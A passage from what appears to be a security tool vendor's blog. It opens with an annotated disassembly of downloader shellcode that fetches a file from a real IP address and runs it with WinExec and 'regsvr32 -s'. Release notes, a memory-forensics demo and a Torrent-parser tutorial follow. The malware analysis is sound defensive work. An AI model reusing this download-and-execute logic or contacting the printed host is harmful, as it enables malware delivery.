04 01 00 00 sub esp, 0x104 000000E8 8D 5C 24 0C lea ebx, dword ptr [esp + 0xc] 000000EC C7 04 24 72 65 67+ mov dword ptr [esp], 0x73676572 000000F3 C7 44 24 04 76 72+ mov dword ptr [esp + 4], 0x32337276 000000FB C7 44 24 08 20 2D+ mov dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack 00000103 53 push ebx 00000104 68 F8 00 00 00 push 0xf8 00000109 FF 56 0C call dword ptr [esi + 0xc] ; call GetTempFilePathA 0000010C 8B E8 mov ebp, eax 0000010E 33 C9 xor ecx, ecx 00000110 51 push ecx 00000111 C7 44 1D 00 77 70+ mov dword ptr [ebp + ebx], 0x74627077 00000119 C7 44 1D 05 2E 64+ mov 
dword ptr [ebp + ebx + 5], 0x6c6c642e 00000121 C6 44 1D 09 00 mov byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path 00000126 59 pop ecx 00000127 8A C1 mov al, cl 00000129 04 30 add al, 0x30 0000012B 88 44 1D 04 mov byte ptr [ebp + ebx + 4], al 0000012F 41 inc ecx 00000130 51 push ecx 00000131 6A 00 push 0 00000133 6A 00 push 0 00000135 53 push ebx 00000136 57 push edi 00000137 6A 00 push 0 00000139 FF 56 14 call dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4 0000013C 85 C0 test eax, eax 0000013E 75 16 jne 0x156 00000140 6A 00 push 0 00000142 53 push ebx 00000143 FF 56 04 call dword ptr [esi + 4] ; calls WinExec on the downloaded file 00000146 6A 00 push 0 00000148 83 EB 0C sub ebx, 0xc 0000014B 53 push ebx 0000014C FF 56 04 call dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file 0000014F 83 C3 0C add ebx, 0xc 00000152 EB 02 jmp 0x156 00000154 EB 13 jmp 0x169 00000156 47 inc edi 00000157 80 3F 00 cmp byte ptr [edi], 0 0000015A 75 FA jne 0x156 0000015C 47 inc edi 0000015D 80 3F 00 cmp byte ptr [edi], 0 00000160 75 C4 jne 0x126 00000162 6A 00 push 0 00000164 6A FE push -2 00000166 FF 56 08 call dword ptr [esi + 8] ; calls TerminateThread 00000169 E8 9C FE FF FF call 0xa
00000000 66 83 E4 FC        and       sp, 0xfffc
00000004 FC                 cld       
00000005 85 E4              test      esp, esp
00000007 75 34              jne       0x3d

0000000A 5F                 pop       edi
0000000B 33 C0              xor       eax, eax
0000000D 64 8B 40 30        mov       eax, dword ptr fs:[eax + 0x30]
00000011 8B 40 0C           mov       eax, dword ptr [eax + 0xc]
00000014 8B 70 1C           mov       esi, dword ptr [eax + 0x1c]
00000017 56                 push      esi
00000018 8B 76 08           mov       esi, dword ptr [esi + 8]
0000001B 33 DB              xor       ebx, ebx
0000001D 66 8B 5E 3C        mov       bx, word ptr [esi + 0x3c]
00000021 03 74 33 2C        add       esi, dword ptr [ebx + esi + 0x2c]
00000025 81 EE 15 10 FF FF  sub       esi, 0xffff1015
0000002B B8 8B 40 30 C3     mov       eax, 0xc330408b
00000030 46                 inc       esi
00000031 39 06              cmp       dword ptr [esi], eax
00000033 75 FB              jne       0x30
00000035 87 34 24           xchg      dword ptr [esp], esi
00000038 85 E4              test      esp, esp
0000003A 75 51              jne       0x8d

0000003D EB 4C              jmp       0x8b

; resolve API
0000003F 51                 push      ecx
00000040 56                 push      esi
00000041 8B 75 3C           mov       esi, dword ptr [ebp + 0x3c]
00000044 8B 74 35 78        mov       esi, dword ptr [ebp + esi + 0x78]
00000048 03 F5              add       esi, ebp
0000004A 56                 push      esi
0000004B 8B 76 20           mov       esi, dword ptr [esi + 0x20]
0000004E 03 F5              add       esi, ebp
00000050 33 C9              xor       ecx, ecx
00000052 49                 dec       ecx
00000053 41                 inc       ecx
00000054 FC                 cld       
00000055 AD                 lodsd     eax, dword ptr [esi]
00000056 03 C5              add       eax, ebp
00000058 33 DB              xor       ebx, ebx
0000005A 0F BE 10           movsx     edx, byte ptr [eax]
0000005D 38 F2              cmp       dl, dh
0000005F 74 08              je        0x69
00000061 C1 CB 0D           ror       ebx, 0xd
00000064 03 DA              add       ebx, edx
00000066 40                 inc       eax
00000067 EB F1              jmp       0x5a
00000069 3B 1F              cmp       ebx, dword ptr [edi]
0000006B 75 E6              jne       0x53
0000006D 5E                 pop       esi
0000006E 8B 5E 24           mov       ebx, dword ptr [esi + 0x24]
00000071 03 DD              add       ebx, ebp
00000073 66 8B 0C 4B        mov       cx, word ptr [ebx + ecx*2]
00000077 8D 46 EC           lea       eax, dword ptr [esi - 0x14]
0000007A FF 54 24 0C        call      dword ptr [esp + 0xc]
0000007E 8B D8              mov       ebx, eax
00000080 03 DD              add       ebx, ebp
00000082 8B 04 8B           mov       eax, dword ptr [ebx + ecx*4]
00000085 03 C5              add       eax, ebp
00000087 AB                 stosd     dword ptr es:[edi], eax
00000088 5E                 pop       esi
00000089 59                 pop       ecx
0000008A C3                 ret       

0000008B EB 53              jmp       0xe0

0000008D AD                 lodsd     eax, dword ptr [esi]
0000008E 8B 68 20           mov       ebp, dword ptr [eax + 0x20]
00000091 80 7D 0C 33        cmp       byte ptr [ebp + 0xc], 0x33
00000095 74 03              je        0x9a
00000097 96                 xchg      eax, esi
00000098 EB F3              jmp       0x8d
0000009A 8B 68 08           mov       ebp, dword ptr [eax + 8]
0000009D 8B F7              mov       esi, edi
0000009F 6A 05              push      5
000000A1 59                 pop       ecx
000000A2 E8 98 FF FF FF     call      0x3f ; resolve API
000000A7 E2 F9              loop      0xa2 ; loops resolving the following APIs:
                                            ; LoadLibraryA
                                            ; WinExec
                                            ; TerminateThread
                                            ; GetTempPathA
                                            ; VirtualProtect
000000A9 E8 00 00 00 00     call      0xae
000000AE 58                 pop       eax
000000AF 50                 push      eax
000000B0 6A 40              push      0x40
000000B2 68 FF 00 00 00     push      0xff
000000B7 50                 push      eax
000000B8 83 C0 19           add       eax, 0x19
000000BB 50                 push      eax
000000BC 55                 push      ebp
000000BD 8B EC              mov       ebp, esp
000000BF 8B 5E 10           mov       ebx, dword ptr [esi + 0x10]
000000C2 83 C3 05           add       ebx, 5
000000C5 FF E3              jmp       ebx  ; calls VirtualProtect with stolen bytes
000000C7 68 6F 6E 00 00     push      0x6e6f
000000CC 68 75 72 6C 6D     push      0x6d6c7275 ; pushes URLMON string to stack
000000D1 54                 push      esp
000000D2 FF 16              call      dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address
000000D4 83 C4 08           add       esp, 8
000000D7 8B E8              mov       ebp, eax
000000D9 E8 61 FF FF FF     call      0x3f ; resolves URLDownloadToFileA
000000DE EB 02              jmp       0xe2

000000E0 EB 72              jmp       0x154

000000E2 81 EC 04 01 00 00  sub       esp, 0x104
000000E8 8D 5C 24 0C        lea       ebx, dword ptr [esp + 0xc]
000000EC C7 04 24 72 65 67+ mov       dword ptr [esp], 0x73676572
000000F3 C7 44 24 04 76 72+ mov       dword ptr [esp + 4], 0x32337276
000000FB C7 44 24 08 20 2D+ mov       dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack
00000103 53                 push      ebx
00000104 68 F8 00 00 00     push      0xf8
00000109 FF 56 0C           call      dword ptr [esi + 0xc] ; calls GetTempPathA
0000010C 8B E8              mov       ebp, eax
0000010E 33 C9              xor       ecx, ecx
00000110 51                 push      ecx
00000111 C7 44 1D 00 77 70+ mov       dword ptr [ebp + ebx], 0x74627077
00000119 C7 44 1D 05 2E 64+ mov       dword ptr [ebp + ebx + 5], 0x6c6c642e
00000121 C6 44 1D 09 00     mov       byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path
00000126 59                 pop       ecx
00000127 8A C1              mov       al, cl
00000129 04 30              add       al, 0x30
0000012B 88 44 1D 04        mov       byte ptr [ebp + ebx + 4], al
0000012F 41                 inc       ecx
00000130 51                 push      ecx
00000131 6A 00              push      0
00000133 6A 00              push      0
00000135 53                 push      ebx
00000136 57                 push      edi
00000137 6A 00              push      0
00000139 FF 56 14           call      dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4
0000013C 85 C0              test      eax, eax
0000013E 75 16              jne       0x156
00000140 6A 00              push      0
00000142 53                 push      ebx
00000143 FF 56 04           call      dword ptr [esi + 4] ; calls WinExec on the downloaded file
00000146 6A 00              push      0
00000148 83 EB 0C           sub       ebx, 0xc
0000014B 53                 push      ebx
0000014C FF 56 04           call      dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file
0000014F 83 C3 0C           add       ebx, 0xc
00000152 EB 02              jmp       0x156

00000154 EB 13              jmp       0x169

00000156 47                 inc       edi
00000157 80 3F 00           cmp       byte ptr [edi], 0
0000015A 75 FA              jne       0x156
0000015C 47                 inc       edi
0000015D 80 3F 00           cmp       byte ptr [edi], 0
00000160 75 C4              jne       0x126
00000162 6A 00              push      0
00000164 6A FE              push      -2
00000166 FF 56 08           call      dword ptr [esi + 8] ; calls TerminateThread

00000169 E8 9C FE FF FF     call      0xa
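
The name-matching loop in the "resolve API" routine (offsets 0x58 to 0x6B) sign-extends each character of an export name, rotates the accumulator right by 13 bits and adds the character, then compares the result with a dword stored in the payload. A minimal Python sketch of that hash follows, assuming the export names are plain NUL-terminated ASCII; the function names are hypothetical, and the candidate list is just the set of APIs named in the comments of the listing.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def export_name_hash(name):
    """Mirror the loop: ror ebx, 0xd / add ebx, edx for every name byte."""
    h = 0
    for byte in name:
        # movsx edx, byte ptr [eax] sign-extends the character
        signed = byte - 0x100 if byte & 0x80 else byte
        h = (ror32(h, 13) + signed) & 0xFFFFFFFF
    return h

# Candidate names taken from the comments in the listing
candidates = [b"LoadLibraryA", b"WinExec", b"TerminateThread",
              b"GetTempPathA", b"VirtualProtect", b"URLDownloadToFileA"]
hash_to_name = {export_name_hash(n): n for n in candidates}

for value, name in sorted(hash_to_name.items()):
    print("%08X %s" % (value, name.decode("ascii")))
```

With such a table, each hash dword that the shellcode compares against (`cmp ebx, dword ptr [edi]`) can be looked up directly instead of stepping through the loop in the debugger.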

So yes, in the end it just downloads the file from the address we've seen and tries to execute it, then tries to register it as a COM object. Some AV-evasion techniques are also present.
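
The strings mentioned in the comments of the listing are not stored as text: they are built from 32-bit immediates, which x86 writes to memory in little-endian order. The sketch below decodes the immediates copied from the listing; the helper names are hypothetical, and the file-name helper only mirrors the `add al, 0x30` step that patches a digit into the name.

```python
import struct

def dwords_to_bytes(*dwords):
    """Lay out 32-bit immediates in memory order (little-endian)."""
    return b"".join(struct.pack("<I", d) for d in dwords)

# mov dword ptr [esp], ... / [esp + 4], ... / [esp + 8], ...
command_prefix = dwords_to_bytes(0x73676572, 0x32337276, 0x20732D20)

# push 0x6e6f happens first, so 0x6d6c7275 ends up at the lower address
library_name = dwords_to_bytes(0x6D6C7275, 0x6E6F).rstrip(b"\x00")

def dropped_file_name(counter):
    """Rebuild the name written after the temp path for a given counter."""
    stem = struct.pack("<I", 0x74627077)       # bytes at offsets 0..3
    ext = struct.pack("<I", 0x6C6C642E)        # bytes at offsets 5..8
    digit = bytes([(counter + 0x30) & 0xFF])   # add al, 0x30 -> offset 4
    return (stem + digit + ext).decode("latin-1")

print(command_prefix, library_name, dropped_file_name(0))
```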

Cheers!

Profiler 2.6

Profiler 2.6 is out with the following news:

– added initial support for XML files
– added support for XDP files (extraction of embedded PDFs)
– exposed the ABC format
– improved the parsing of malformed PDF streams
– fixed the code signing on OS X to meet El Capitan requirements
– fixed the JS debugger on Linux
– various bug fixes and improvements

Enjoy!

Windows Memory Forensics

Let’s begin with an image:

Yep. That’s an icon. In an executable. In a process address space. In a raw memory dump.

And here is the video demonstration:

This is just a proof-of-concept. We still haven’t decided whether to develop this further. It really depends on whether the forensic community is interested in having such a product. So, even a re-tweet will have an impact on our decision. 🙂 We wanted to show what is currently possible and, of course, it’s not the end of the cool things which are possible.

In case we decide to go ahead with the development, we will probably create a beta-test group of potential customers and decide with them a roadmap for a 1.0 version, taking into consideration all those features which are essential to them. What we already support are the Windows versions that go from XP to 10 on the following architectures: x86, x86-PAE, x64. And, of course, the software itself, just like Profiler, runs on Windows, OS X and Linux.

And now to the more technical side if you’re interested. What we have shown in this demonstration is just a Python extension for Profiler. To be more specific, it’s only about 1000 lines of Python code and this includes all the UI views. The bulk of the work went into exposing all the necessary capabilities of our SDK to Python. Of course, all this work also benefits other extensions, not just the memory forensics ones. So, if this project ends with this post, it’s really not a tragedy, as we haven’t lost any significant time developing specific stuff for it.

So why did we choose to write our memory forensics support in Python, rather than in C++, which would’ve taken us a lot less time? There are several reasons. The memory forensics field changes rapidly, and setting code in stone by compiling it wouldn’t be a good idea. Also, we wanted to give our customers the possibility to inspect the code and to modify it. Just by looking at existing code it’s extremely easy to write new utilities. On the other hand, having our core engine and UI written in C++ makes our tool very fast. We think this is the perfect combination.

If you’re wondering why we didn’t use Volatility as a backbone, the answer is that it would’ve been incompatible on a licensing level and way too difficult to fit nicely into our existing framework to accomplish what we wanted to do.

We hope you enjoyed the demo and we would be happy to receive your feedback!

Profiler 2.5

Profiler 2.5 is out with the following news:

– introduced scan provider extensions
– added support for Torrent files
– added the capability to display views as dialogs
– exposed official Python bindings for capstone
– added new controls to custom views
– updated capstone to 3.0.3
– fixed failed allocation security issue
– various bug fixes and improvements

Dialogs from views

In this new edition it’s possible to create dialogs out of views. Just like this:

ctx = proContext()
view = ctx.createView(ProView.Type_Custom, "Dialog title")
view.setup(view_layout, viewCallback, user_data)
dlg = ctx.createDialog(view)
dlg.show()

Of course, it doesn’t have to be a custom view, it can even be a simple text view or a hex view, although usually custom views make more sense for a dialog, as you’ll probably want to show some standard buttons like “Ok” and “Cancel” at the bottom.

Capstone bindings

While Capstone has been part of Profiler for quite some time, it’s now possible to call its official Python bindings directly. The module can be found under ‘Pro.capstone’ and can easily be imported so that it works with existing code:

import Pro.capstone as capstone

Failed allocation security issue

In the Qt framework memory allocations fail silently, at least in the release version. We didn’t notice it, because in the debug version they would at least throw an exception preventing further execution. Since in release the execution wouldn’t be stopped, it was in some cases possible to trigger a failed allocation and then make the program use memory it didn’t own (so basically a buffer overflow). This problem has now been fixed.

Credit goes to the Insid3Code Team for having found and reported the issue.

Enjoy!

Torrent Support

Following our recent introduction to Scan Providers, here’s a first implementation example. In this post we’ll see how to add support for Torrent files in Profiler. Of course, the implementation shown in this post will be available in the upcoming 2.5.0 release.

Let’s start by creating an entry in the configuration file:

[Torrent]
label = BitTorrent File
group = db
file = Torrent.py
allocator = torrentAllocator

For the automatic signature recognition we may rely on a simple one:

rule torrent
{
    strings:
        $sig = "d8:announce"

    condition:
        $sig at 0
}

Torrent files are encoded dictionaries and they usually start with the announce item. There’s no guarantee for that, but for now this simple matching should be good enough.
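
To see why the signature works in the common case, here is a small encoder sketch for the same dictionary encoding. It is not part of Profiler; the function name and the sample tracker URL are made up for illustration. Dictionary keys are written in sorted order, so a file that has an "announce" key and no key sorting before it begins with `d8:announce`, while a file without that key would not match the rule.

```python
def bencode(value):
    """Encode ints, bytes, lists and dicts (with bytes keys)."""
    if isinstance(value, bool):
        raise TypeError("bool is not an encodable type")
    if isinstance(value, int):
        return b"i" + str(value).encode("ascii") + b"e"
    if isinstance(value, bytes):
        return str(len(value)).encode("ascii") + b":" + value
    if isinstance(value, list):
        return b"l" + b"".join(bencode(v) for v in value) + b"e"
    if isinstance(value, dict):
        out = b"d"
        for key in sorted(value):  # keys are emitted in sorted order
            if not isinstance(key, bytes):
                raise TypeError("dictionary keys must be bytes")
            out += bencode(key) + bencode(value[key])
        return out + b"e"
    raise TypeError("unsupported type: %r" % type(value))

# Hypothetical minimal torrent-like dictionary
sample = bencode({
    b"info": {b"length": 3, b"name": b"a.txt"},
    b"announce": b"http://tracker.example/announce",
})
print(sample[:11])
```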

The encoded dictionary is in the Bencode format. Fortunately, someone already wrote the Python code to decode it:

#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License).  You may not copy or use this file, in either
# source code or executable form, except in compliance with the License.  You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied.  See the License
# for the specific language governing rights and limitations under the
# License.

# Written by Petru Paler

def decode_int(x, f):
    f += 1
    newf = x.index(0x65, f)
    n = int(x[f:newf])
    if x[f] == 0x2D: # -
        if x[f + 1] == 0x30:
            raise ValueError
    elif x[f] == 0x30 and newf != f+1:
        raise ValueError
    return (n, newf+1)

def decode_string(x, f):
    colon = x.index(0x3A, f) # :
    n = int(x[f:colon])
    if x[f] == 0x30 and colon != f+1:
        raise ValueError
    colon += 1
    return (x[colon:colon+n], colon+n)

def decode_list(x, f):
    r, f = [], f+1
    while x[f] != 0x65: # e
        v, f = decode_func[x[f]](x, f)
        r.append(v)
    return (r, f + 1)

def decode_dict(x, f):
    r, f = {}, f+1
    while x[f] != 0x65: # e
        k, f = decode_string(x, f)
        r[k], f = decode_func[x[f]](x, f)
    return (r, f + 1)

decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int  # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string

def bdecode(x):
    try:
        r, l = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        return {}
    if l != len(x):
        return {}
    return r
    
#
# END OF 3RD PARTY CODE
#

We can now load the file and decode its dictionary:

class TorrentObject(CFFObject):

    def __init__(self):
        super(TorrentObject, self).__init__()
        self.SetObjectFormatName("TORRENT")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)
        self.tdict = None
        
    def GetDictionary(self):
        if self.tdict is None:
            size = min(self.GetSize(), MAX_TORRENT_SIZE)
            data = self.Read(0, size)
            self.tdict = bdecode(bytes(data))
        return self.tdict

class TorrentScanProvider(ScanProvider):

    def __init__(self):
        super(TorrentScanProvider, self).__init__()
        self.obj = None
        
        # ....

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TorrentObject()
        self.obj.Load(self.getStream())
        d = self.obj.GetDictionary()
        return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR

We call the GetDictionary method for the first time in the _initObject method, so that the parsing happens while we're in another thread and doesn't stall the UI.
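
The "parse once, reuse afterwards" idea can be tried outside of Profiler as well. The following is only a sketch under assumptions: LazyParsed, get_dictionary and parse_calls are hypothetical names, and a trivial lambda stands in for bdecode.

```python
MAX_TORRENT_SIZE = 10485760  # 10 MBs, the same cap used in the article


class LazyParsed:
    """Hypothetical stand-in for TorrentObject, without the Profiler SDK."""

    def __init__(self, data, parser):
        self._data = data
        self._parser = parser
        self._parsed = None
        self.parse_calls = 0  # only here to make the caching visible

    def get_dictionary(self):
        if self._parsed is None:
            self.parse_calls += 1
            # never hand more than MAX_TORRENT_SIZE bytes to the parser
            self._parsed = self._parser(self._data[:MAX_TORRENT_SIZE])
        return self._parsed


obj = LazyParsed(b"d3:fooi1ee", lambda raw: {"bytes_seen": len(raw)})
first = obj.get_dictionary()    # expensive call, made once (think _initObject)
second = obj.get_dictionary()   # later calls, e.g. from the UI, reuse the result
print(obj.parse_calls)
```

Whichever thread makes the first call pays for the parsing, which is why it matters that the first call happens in _initObject.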

Let’s display the parsed dictionary to the user:

    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, self.FormatItem_Dictionary)
        return ft
        
    def _formatViewInfo(self, finfo):
        if finfo.fid >= 1 and finfo.fid - 1 < len(self.fi_names):
            finfo.text = self.fi_names[finfo.fid - 1]
            return True
        return False

    def _formatViewData(self, sdata):
        if sdata.fid == self.FormatItem_Dictionary:
            sdata.setViews(SCANVIEW_TEXT)
            txt = pprint.pformat(self.obj.GetDictionary())
            sdata.data.setData(txt)
            return True
        return False

Dictionary
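
Format item IDs start at 1, while the list of names is indexed from 0, so both ends of the range matter when mapping one to the other. A standalone sketch of that lookup (format_item_label is a hypothetical helper, and FI_NAMES mirrors the labels used by the provider):

```python
FI_NAMES = ["Dictionary", "Trackers", "Files"]  # labels for item IDs 1, 2, 3


def format_item_label(fid, names=FI_NAMES):
    """Return the label for a 1-based format item ID, or None if out of range."""
    # Without the lower bound, an ID of 0 would index names[-1] and silently
    # return the last label; without the upper bound we'd get an IndexError.
    if 1 <= fid <= len(names):
        return names[fid - 1]
    return None


for fid in range(0, 5):
    print(fid, format_item_label(fid))
```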

This is the description extracted from Wikipedia of some of the keys:

  • announce—the URL of the tracker
  • info—this maps to a dictionary whose keys are dependent on whether one or more files are being shared:
    • name—suggested filename where the file is to be saved (if one file)/suggested directory name where the files are to be saved (if multiple files)
    • piece length—number of bytes per piece. This is commonly 2^8 KiB = 256 KiB = 262,144 B.
    • pieces—a hash list, i.e., a concatenation of each piece's SHA-1 hash. As SHA-1 returns a 160-bit hash, pieces will be a string whose length is a multiple of 160-bits.
    • length—size of the file in bytes (only when one file is being shared)
    • files—a list of dictionaries each corresponding to a file (only when multiple files are being shared). Each dictionary has the following keys:
      • path—a list of strings corresponding to subdirectory names, the last of which is the actual file name
      • length—size of the file in bytes.
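
To make the layout described above more concrete, here is a small sketch that works on an already decoded info dictionary. The helper names and the sample data are invented for illustration, and joining the path components with "/" is just one possible way of displaying them.

```python
import math

SHA1_SIZE = 20  # a SHA-1 digest is 160 bits, i.e. 20 bytes


def piece_hashes(info):
    """Split the concatenated 'pieces' string into individual SHA-1 digests."""
    pieces = info.get(b"pieces", b"")
    if not isinstance(pieces, bytes) or len(pieces) % SHA1_SIZE != 0:
        return []
    return [pieces[i:i + SHA1_SIZE] for i in range(0, len(pieces), SHA1_SIZE)]


def file_entries(info):
    """Return (path, size) tuples for both single-file and multi-file layouts."""
    if b"files" not in info:
        name, size = info.get(b"name"), info.get(b"length", 0)
        if not isinstance(name, bytes):
            return []
        return [(name.decode("utf-8", errors="replace"),
                 size if isinstance(size, int) else 0)]
    entries = []
    flist = info[b"files"]
    if not isinstance(flist, list):
        return entries
    for fd in flist:
        if not isinstance(fd, dict):
            continue
        parts = fd.get(b"path")
        if not isinstance(parts, list) or not parts:
            continue
        if not all(isinstance(p, bytes) for p in parts):
            continue
        size = fd.get(b"length", 0)
        # the last component is the file name, the others are subdirectories
        path = "/".join(p.decode("utf-8", errors="replace") for p in parts)
        entries.append((path, size if isinstance(size, int) else 0))
    return entries


info = {
    b"name": b"album",
    b"piece length": 262144,
    b"pieces": bytes(3 * SHA1_SIZE),  # three dummy (all-zero) hashes
    b"files": [
        {b"path": [b"cd1", b"track01.flac"], b"length": 400000},
        {b"path": [b"cover.jpg"], b"length": 200000},
    ],
}
entries = file_entries(info)
total = sum(size for _, size in entries)
expected_pieces = math.ceil(total / info[b"piece length"])
print(entries, total, expected_pieces, len(piece_hashes(info)))
```

The number of hashes in pieces should match the total size divided by the piece length, rounded up, so a mismatch between the two is a cheap hint that a torrent file is malformed.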

While the dictionary alone is enough to extract all the information the user needs, some parts of it are easier to read when presented separately.

First, we'd like to show the user the meta-data which may be contained in the dictionary. To do that, we add a meta-data scan entry:

    def _startScan(self):
        d = self.obj.GetDictionary()
        if any(mk in d for mk in self.meta_keys):
            e = ScanEntryData()
            e.category = SEC_Privacy
            e.type = CT_MetaData
            self.addEntry(e)
        if self.obj.GetSize() > MAX_TORRENT_SIZE:
            e = ScanEntryData()
            e.category = SEC_Warn
            e.type = CT_UnaccountedSpace
            self.addEntry(e)
        return self.SCAN_RESULT_FINISHED

We also warn the user if the file exceeds the maximum allowed size. We perform the whole scan logic in the UI thread, since we're not doing any CPU-intensive operation, and thus we return SCAN_RESULT_FINISHED, which causes the _threadScan method not to be called.

Here we return the meta-data to the UI:

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_MetaData:
            d = self.obj.GetDictionary()
            out = proTextStream()
            for mk in self.meta_keys:
                if mk in d:
                    tmk = mk.decode("utf-8", errors="ignore")
                    if tmk == "creation date":
                        dt = self.obj.CreationDate()
                        tmv = dt.toString() if dt.isValid() else "?"
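                    else:
                        # the value comes from an untrusted file: decode it only if it is bytes
                        v = d[mk]
                        tmv = v.decode("utf-8", errors="ignore") if type(v) is bytes else "?"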
                    out._print(tmk)
                    out._print(": ")
                    out._print(tmv)
                    out.nl()
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData(out.buffer)
            return True

MetaData
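
The same formatting can be tried without the SDK. In the full listing the creation date is converted with NTDateTime.fromMSecsSinceEpoch(cd * 1000), so it is treated as seconds since the Unix epoch; the sketch below does the equivalent with the standard library. The function name metadata_lines and the sample values are assumptions made for the example.

```python
from datetime import datetime, timezone

META_KEYS = [b"created by", b"creation date", b"comment"]


def metadata_lines(d):
    """Format the known meta-data keys of a decoded torrent dictionary."""
    lines = []
    for key in META_KEYS:
        if key not in d:
            continue
        value = d[key]
        if key == b"creation date":
            text = "?"
            if isinstance(value, int):
                try:
                    # seconds since the Unix epoch, shown in UTC
                    dt = datetime.fromtimestamp(value, tz=timezone.utc)
                    text = dt.strftime("%Y-%m-%d %H:%M:%S UTC")
                except (OverflowError, OSError, ValueError):
                    pass  # out-of-range timestamp: keep the placeholder
        elif isinstance(value, bytes):
            text = value.decode("utf-8", errors="ignore")
        else:
            text = "?"  # unexpected type in an untrusted file
        lines.append("%s: %s" % (key.decode("utf-8"), text))
    return lines


sample = {
    b"created by": b"mktorrent 1.0",
    b"creation date": 1442966400,
    b"comment": 7,  # deliberately the wrong type
}
lines = metadata_lines(sample)
print("\n".join(lines))
```

Values of an unexpected type are replaced by a placeholder instead of being decoded, so a malformed file cannot make the view fail.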

Also it would be convenient to see the list of trackers and files. Let's start with the trackers:

class TorrentObject(CFFObject):

    # ...

    def GetTrackers(self):
        d = self.GetDictionary()
        trackers = []
        dup = set()
        if b"announce" in d and type(d[b"announce"]) is bytes:
            trackers.append(d[b"announce"])
            dup.add(trackers[0])
        if b"announce-list" in d:
            al = d[b"announce-list"]
            # check every type before using the value (unhashable items can't be looked up in a set)
            if type(al) is list:
                for a in al:
                    if type(a) is list and len(a) > 0 and type(a[0]) is bytes and a[0] not in dup:
                        trackers.append(a[0])
                        dup.add(a[0])
        return trackers

def trackersViewCb(cv, trackers, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(1)
        labels = NTStringList()
        labels.append("Tracker")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setRowCount(len(trackers))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
    return 0

class TorrentScanProvider(ScanProvider):

    # ...

    def _formatViewData(self, sdata):
        # ...
        elif sdata.fid == self.FormatItem_Trackers:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hl margin='0'><table id='1'/></hl></ui>")
            sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
            return True
        return False

Trackers

When retrieving data from the dictionary, we also make sure that it has the expected type, so that the code which handles this data won't end up raising an exception when it encounters an unexpected type.

And now the files:

class TorrentObject(CFFObject):

    # ...

    def GetFiles(self):
        d = self.GetDictionary()
        if not b"info" in d:
            return []
        d = d[b"info"]
        if not type(d) is dict:
            return []
        files = []
        if not b"files" in d:
            if b"name" in d and type(d[b"name"]) is bytes:
                sz = d.get(b"length", 0)
                files.append((d[b"name"], sz if type(sz) is int else 0))
        else:
            flist = d[b"files"]
            if not type(flist) is list:
                return []
            for fd in flist:
                if type(fd) is dict:
                    if b"path" in fd:
                        pt = fd[b"path"]
                        # only the first path component is shown
                        if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
                            sz = fd.get(b"length", 0)
                            files.append((pt[0], sz if type(sz) is int else 0))
        return files

def filesViewCb(cv, files, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(2)
        labels = NTStringList()
        labels.append("Name")
        labels.append("Size")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setColumnCWidth(1, 35)
        tv.setRowCount(len(files))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
            sz = files[data.row][1]
            data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
    return 0

class TorrentScanProvider(ScanProvider):

    # ...

    def _formatViewData(self, sdata):
        # ...
        elif sdata.fid == self.FormatItem_Files:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hl margin='0'><table id='1'/></hl></ui>")
            sdata.setCallback(filesViewCb, self.obj.GetFiles())
            return True
        return False

Files

And that's it. Now again the whole code for a better overview:

from Pro.Core import *
from Pro.UI import pvnInit, pvnGetTableRow
import pprint

MAX_TORRENT_SIZE = 10485760 # 10 MBs

#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#

# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.

